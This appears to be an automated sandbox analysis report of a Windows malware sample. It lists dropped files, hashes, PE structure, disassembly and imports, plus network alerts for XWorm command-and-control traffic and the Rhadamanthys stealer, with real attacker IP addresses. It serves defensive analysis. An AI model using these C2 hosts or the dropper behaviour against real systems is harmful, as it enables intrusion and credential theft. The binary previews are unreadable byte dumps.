                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.M.................x..........~.... ........@.. ....................................@.................................(...S.................................................................................... ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................`.......H.......,O...G............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 27 15:23:32 2024, mtime=Tue Aug 27 15:23:32 2024, atime=Tue Aug 27 13:23:24 2024, length=1312792, window=hide
                                            Category:dropped
                                            Size (bytes):1111
                                            Entropy (8bit):5.065432251526404
                                            Encrypted:false
                                            SSDEEP:24:8ReB2XIRTgKfQrOART5c5CcnJDJUwqygm:8RK2XIR7QrVR1c5pJDJmyg
                                            MD5:D3C3167C32141463285DCCA9E1924422
                                            SHA1:26B3FA2192440C250E0DD9865E98DACE3AD2966A
                                            SHA-256:1AA70BD7E85B47F03EF64CD3503947A84AFE4165E68AF061BAA941351C39AB9B
                                            SHA-512:46A5002952913E0EDE9BEA9DB7658D4FAC39DCD281B86931DAFA40BBE453ED81E31EEFBF0A075BAAE5DEEB21F687B2ACA61606CCE2D7E3B3F60CF9ACD0E38B9F
                                            Malicious:false
                                            Preview:L..................F.... .....0u......gu....Ifs...............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......p....w..~........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y...........................3*N.A.p.p.D.a.t.a...B.P.1......Y...Local.<......EW.=.Y...........................w(P.L.o.c.a.l.....N.1......Y...Temp..:......EW.=.Y...........................J.).T.e.m.p.....v.2......Y.r .SENDBU~1.EXE..Z.......Y..Y.....S#.......................S.e.n.d.B.u.g.R.e.p.o.r.t.N.e.w...e.x.e.......i...............-.......h............C......C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe..=.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.S.e.n.d.B.u.g.R.e.p.o.r.t.N.e.w...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2015240
                                            Entropy (8bit):6.681879780616523
                                            Encrypted:false
                                            SSDEEP:24576:v2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6W:vRSf0Ww+NpPSyzYY8c8YEPI4+W
                                            MD5:9A438A75E68E88CDABC13074A17F8A52
                                            SHA1:97C94801D37D249ECE7BA9ACA05703303FD9CF06
                                            SHA-256:CCCCADDE7393F1B624CDE32B38274E60BBE65B1769D614D129BABDAEEF9A6715
                                            SHA-512:19D260505972B96C2E5AE0058A29F61E606E276779A80732DBEE70F9223DBFF51DCB1F5E4EFF19206C300EE08E6060987171F5B83AD87FDD8F797E0E2DB529FC
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: Archivevalidv4.exe, Detection: malicious, Browse
                                            • Filename: , Detection: malicious, Browse
                                            • Filename: iobituninstaller.exe, Detection: malicious, Browse
                                            • Filename: iobituninstaller.exe, Detection: malicious, Browse
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H.....................l............... .....P.................................8...............................P...'...`.......................t...L.......^.............."....................................y...............................text...4........................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata...'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):228872
                                            Entropy (8bit):6.587649015139548
                                            Encrypted:false
                                            SSDEEP:3072:f4af8kXL6nX0YXjvkWQ5vYhbNkWPFOEJ8YZbjeTl0Y25zFgYBzRKy6sB65avEtAf:Qaf8kLWL7Xov8bNxdOmrfgYmHA6G
                                            MD5:8AAA3926885B3FA7AE0448F5E700CB79
                                            SHA1:47BD7D281DDDE5EBEF8599482212743BF2F7E67B
                                            SHA-256:47396C301FBE78BFAF9E344936A0F7A4E6D174C096F847E160D822E48012162D
                                            SHA-512:86D395CA89EC2A988F035ECB32640DDAC99247E2568673246388FE310E8C3A44807049E8F3482FAE86C453D5E3529A8F2DAF8614A1086B6D979E64FD917BBE3A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H..........................................1P.................................E...................................|......&....P...>...........2...L... ...!..............!................................... ................................text...8........................... ..`.itext.............................. ..`.data...P...........................@....bss....<................................idata..&...........................@....edata...|.......~...R..............@..@.rdata..!...........................@..@.reloc...!... ..."..................@..B.rsrc....>...P...>..................@..@.....................2..............@..@................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):433152
                                            Entropy (8bit):5.554218335234964
                                            Encrypted:false
                                            SSDEEP:6144:YAYM3ZEWqf/qwPF7LR5W8ZJ74zmRiOFBbMh9q/JSB3ChNeK06iiRzmi0F9:YWBqf/qq3R5W8ZB4zmRzbassViRUF9
                                            MD5:AE36397A23D16920DDFE4DFEC24F6B85
                                            SHA1:49F1EDAF5AF83457FC10D1E73680B59202057E28
                                            SHA-256:E36BBDF75E56C4D0562BA5ABA9E78D483A6196FE1EC891CC71EF9DB5556C9C81
                                            SHA-512:7642E0509969B1DE936F6F30A7A899BCEDA2DDA526759911F2FF47BD32002DC992322D02347D26DFD3EB0594922F068BF9BE20BB760CE08A006F64D78781D0C3
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......UP.|.1@/.1@/.1@/ZIC..1@/ZIE..1@/ZID..1@/.NE.71@/.ND..1@/.NC..1@/ZIA..1@/.1A/v1@/+.D..1@/.1@/.1@/+../.1@/+.B..1@/Rich.1@/........................PE..L..._{_d...............%............5R....... ....@.......................................@.................................Ly..P...............................@...@n...............................m..@............ ..d............................text...3........................... ..`.textbss..... ...........................rdata...a... ...b..................@..@.data... ............l..............@....rsrc................v..............@..@.reloc..@...........................@..B................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.966606172288751
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:file.exe
                                            File size:2'594'056 bytes
                                            MD5:61d31fb13c1dd46fcb03caf7f648508c
                                            SHA1:ecd46d1e09bdfa50c1587690e70262bc14ba751c
                                            SHA256:6cd031908922840ee684d3c05294e7e071b500915b760c474f22c1def0df14bc
                                            SHA512:c0a20fd176c812f47902da3da6b1bbde8924218666752be985245a5bb804c943a9312550d110f3a95096042991ef8cec9b1931377e4a8d09781c406b9da31127
                                            SSDEEP:49152:+pz3Y5ANfs2/w8JUgyUBx8pQIVf/OV9UdOV8ZUhJgnVlz2sTyNy:+pk5Am2/w8J9L8pQIVf/OMO277z9TWy
                                            TLSH:D2C5334237C0D8FCDA22C132AF28EB974177D3A42B5A5F479ECA0F469D931B246471DA
                                            File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.............................
                                            Icon Hash:d292fcd8f2f2fe1c
                                            Entrypoint:0x411def
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:
                                            Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b5a014d7eeb4c2042897567e1288a095
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            push FFFFFFFFh
                                            push 00414C50h
                                            push 00411F80h
                                            mov eax, dword ptr fs:[00000000h]
                                            push eax
                                            mov dword ptr fs:[00000000h], esp
                                            sub esp, 68h
                                            push ebx
                                            push esi
                                            push edi
                                            mov dword ptr [ebp-18h], esp
                                            xor ebx, ebx
                                            mov dword ptr [ebp-04h], ebx
                                            push 00000002h
                                            call dword ptr [00413184h]
                                            pop ecx
                                            or dword ptr [00419924h], FFFFFFFFh
                                            or dword ptr [00419928h], FFFFFFFFh
                                            call dword ptr [00413188h]
                                            mov ecx, dword ptr [0041791Ch]
                                            mov dword ptr [eax], ecx
                                            call dword ptr [0041318Ch]
                                            mov ecx, dword ptr [00417918h]
                                            mov dword ptr [eax], ecx
                                            mov eax, dword ptr [00413190h]
                                            mov eax, dword ptr [eax]
                                            mov dword ptr [00419920h], eax
                                            call 00007F2DD10E5DC2h
                                            cmp dword ptr [00417710h], ebx
                                            jne 00007F2DD10E5CAEh
                                            push 00411F78h
                                            call dword ptr [00413194h]
                                            pop ecx
                                            call 00007F2DD10E5D94h
                                            push 00417048h
                                            push 00417044h
                                            call 00007F2DD10E5D7Fh
                                            mov eax, dword ptr [00417914h]
                                            mov dword ptr [ebp-6Ch], eax
                                            lea eax, dword ptr [ebp-6Ch]
                                            push eax
                                            push dword ptr [00417910h]
                                            lea eax, dword ptr [ebp-64h]
                                            push eax
                                            lea eax, dword ptr [ebp-70h]
                                            push eax
                                            lea eax, dword ptr [ebp-60h]
                                            push eax
                                            call dword ptr [0041319Ch]
                                            push 00417040h
                                            push 00417000h
                                            call 00007F2DD10E5D4Ch
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x18d04.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x1a0000x18d040x18e009dee09854e79aa987e5336a4defda540False0.2433358197236181data5.382874846103129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x1a1f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6781914893617021
                                            RT_ICON0x1a6580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.47068480300187615
                                            RT_ICON0x1b7000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.41161825726141077
                                            RT_ICON0x1dca80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.3213863958431743
                                            RT_ICON0x21ed00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584RussianRussia0.1865609842659411
                                            RT_GROUP_ICON0x326f80x4cdataRussianRussia0.7763157894736842
                                            RT_VERSION0x327440x350dataEnglishUnited States0.47523584905660377
                                            RT_MANIFEST0x32a940x270ASCII text, with very long lines (624), with no line terminatorsEnglishUnited States0.5144230769230769
                                            DLLImport
                                            COMCTL32.dll
                                            KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                            USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                            GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                            SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                            ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                            OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                            MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                            Language of compilation systemCountry where language is spokenMap
                                            RussianRussia
                                            EnglishUnited States
                                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                            2024-08-27T18:25:39.178331+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349742154.216.19.149192.168.2.7
                                            2024-08-27T18:27:41.196133+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:25:34.785984+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:24:30.796640+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:25:20.764109+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:20.764109+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:57.630580+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:04.577640+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:27:26.866896+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:12.788465+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349738154.216.19.149192.168.2.7
                                            2024-08-27T18:26:49.796937+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:57.626918+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:38.022006+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:47.874046+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349743154.216.19.149192.168.2.7
                                            2024-08-27T18:25:06.198814+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349737154.216.19.149192.168.2.7
                                            2024-08-27T18:26:26.349934+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:27:10.633780+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:25:26.009886+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349740154.216.19.149192.168.2.7
                                            2024-08-27T18:26:49.692892+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:54.396979+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:27:10.629778+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:01.054684+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349745154.216.19.149192.168.2.7
                                            2024-08-27T18:26:04.674425+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:24:50.775975+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:24:50.775975+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:32.243193+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:09.054842+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:25:33.370929+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:24:30.794802+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:47.100381+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:24:20.770041+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:24:20.770041+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:32.286779+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:27:26.868692+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:24:42.460464+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:23:55.617151+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1204749722154.216.19.149192.168.2.7
                                            2024-08-27T18:23:55.617151+0200TCP2854824ETPRO JA3 HASH Suspected Malware Related Response2204749722154.216.19.149192.168.2.7
                                            2024-08-27T18:26:20.762189+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:20.762189+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:17.618090+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:27:20.760087+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:27:20.760087+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:27.456651+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349749154.216.19.149192.168.2.7
                                            2024-08-27T18:26:50.765418+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:50.765418+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:56.694912+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:25:47.105103+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:26.168534+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:24:13.397343+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349724154.216.19.149192.168.2.7
                                            2024-08-27T18:26:58.981890+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:20.847926+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349748154.216.19.149192.168.2.7
                                            2024-08-27T18:25:32.600766+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349741154.216.19.149192.168.2.7
                                            2024-08-27T18:26:04.628339+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:27:20.210101+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349757154.216.19.149192.168.2.7
                                            2024-08-27T18:24:59.597331+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349736154.216.19.149192.168.2.7
                                            2024-08-27T18:25:50.757178+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:50.757178+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:05.826678+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:26.348263+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:26:04.528278+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:27:29.788300+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:00.915808+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:33.268990+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:19.421341+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349739154.216.19.149192.168.2.7
                                            2024-08-27T18:25:33.270765+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:58.985323+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:27:07.007597+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349755154.216.19.149192.168.2.7
                                            2024-08-27T18:24:33.103498+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349732154.216.19.149192.168.2.7
                                            2024-08-27T18:26:04.629665+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:26:38.024231+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
                                            2024-08-27T18:25:20.733952+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:24:39.764202+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349733154.216.19.149192.168.2.7
                                            2024-08-27T18:25:54.412909+0200TCP2854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert144349744154.216.19.149192.168.2.7
                                            2024-08-27T18:27:41.194654+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes166774972685.209.133.150192.168.2.7
                                            2024-08-27T18:25:17.677745+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1497266677192.168.2.785.209.133.150
